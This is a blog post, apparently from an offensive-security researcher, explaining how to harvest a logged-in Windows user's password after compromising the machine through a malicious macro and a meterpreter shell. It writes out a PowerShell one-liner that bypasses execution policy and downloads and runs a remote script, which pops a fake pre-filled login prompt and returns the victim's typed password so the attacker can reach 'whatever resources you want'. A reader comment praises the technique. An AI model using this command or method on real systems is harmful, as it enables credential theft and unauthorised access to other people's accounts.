Phishing for Credentials: If you want it, just ask!

**Update**

I have updated the script so it checks for credential validation. The prompt will not close until the user enters the correct password. Once validated, it will display the password for you.

Today, I was playing with Invoke-Mimikatz, which was created by @JosephBialek, which takes Mimikatz (created by @gentilkiwi) and loads it into memory. I absolutely LOVE this tool, but I get sad when I don’t have admin rights on the box and I don’t want to touch disk. If all you are after are the current user’s credentials (for email, vpn, network access), you can use this method. I initially thought of this after reading a report by FireEye regarding FIN4’s method of invoking an outlook login prompt when the macro is ran. You can find this report here

You can find my code here:

https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1

Basically, you compromise a machine using a malicious VBA macro or some sort of other vector. Once you have access to this machine, drop to a shell by typing “Shell” at the meterpreter prompt.

3333

 

From there, you can run the following command: powershell.exe -ep bypass -c IEX ((New-Object Net.WebClient).DownloadString(‘URL_To_Invoke-LoginPrompt’)); Invoke-LoginPrompt

*When you add the URL to the Invoke-LoginPrompt script, make sure you use the “Raw” version on github or host your own*

33333322

 

When this runs, the user will get a prompt that is pre-populated with their domain and username.

22222

 

When the user enters their password, it will return it to you with the domain and the user’s username:

5555

 

From there, you can now login to whatever resources you want as that user.

 

 

 

Thanks,

Matt N. (@enigma0x3)

3 thoughts on “Phishing for Credentials: If you want it, just ask!

  1. Awesome ! I’ve come across this situation a few times and always had to somehow elevate to SYSTEM or local admin to get hashes/clear-text passes out.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s